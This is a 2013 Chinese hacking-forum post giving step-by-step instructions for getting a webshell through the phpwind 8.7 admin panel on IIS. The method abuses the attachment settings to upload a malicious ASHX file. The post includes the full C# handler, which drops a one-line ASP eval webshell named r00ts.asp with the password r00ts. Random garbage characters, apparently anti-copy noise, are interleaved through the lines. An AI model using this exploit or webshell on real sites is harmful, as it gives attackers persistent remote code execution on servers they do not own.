中国网络渗透测试联盟

标题: phpwind 8.7 后台拿shell [打印本页]

作者: admin    时间: 2013-7-26 12:41
标题: phpwind 8.7 后台拿shell
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
+ W7 r9 y$ A5 V. c5 T
' ]/ C6 t& H3 p7 Y9 N群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
" i( N: t5 D% D2 X: W! ?* R . i* _, x8 O1 o( P" Q5 ^& F
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
7 h; A' J/ Q* I4 _- r9 m' S
! C" d8 O! j- p% f3 N, B, B4 [: C然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
. ^; N( N$ K( ^: L! V. c- ]
. R3 G: v0 `* h! u( {# r打开之后空白 会在目录底下生成r00ts.asp 密码r00ts; L1 u3 u5 S; F. Z+ p5 T

5 [6 |+ ^+ d" R2 |4 G1 L下面是代码:+ O9 y. T$ b1 \

( q3 _7 d8 i: @) V" d<%@ WebHandler Language="C#"Class="Handler" %>: v9 \* h7 x- f* @4 a# G9 u/ p
using System;
* }* B/ ]" R* c# u$ M2 jusing System.Web;
9 _  g3 a7 A) ^using System.IO;
; G' K- j0 [8 z: e) F2 F+ n, xpublic class Handler : IHttpHandler {( q# r9 \+ X, f1 G' v9 g: p
public void ProcessRequest (HttpContext context) {
' q6 L- }, p( L& h4 E- K& hcontext.Response.ContentType = "text/plain";2 p, S5 y% j: g) g
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));+ _2 z6 t& q% b* n1 L
file1.Write("<%eval request(\"r00ts\")%>");
# m# ]1 L- p0 V5 T4 w! Tfile1.Flush();. B& P: L6 j7 {" @& [/ V% H  \
file1.Close();2 w0 |7 j0 `! d' K( s" l% Q
}
! O0 K, v* k/ {public bool IsReusable {
& l9 \4 b, o; h) f" W! zget {. F/ P" ^* J+ F& d) C  M& T: G
return false;
1 B: `" V. l1 p8 [, G: C5 S}! n# s* g, i) X( ?* O+ k! I
}
) ]7 T/ C  B) B& P1 ~* s- G) D}* C/ R' P, w% {6 U" U$ K; A





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2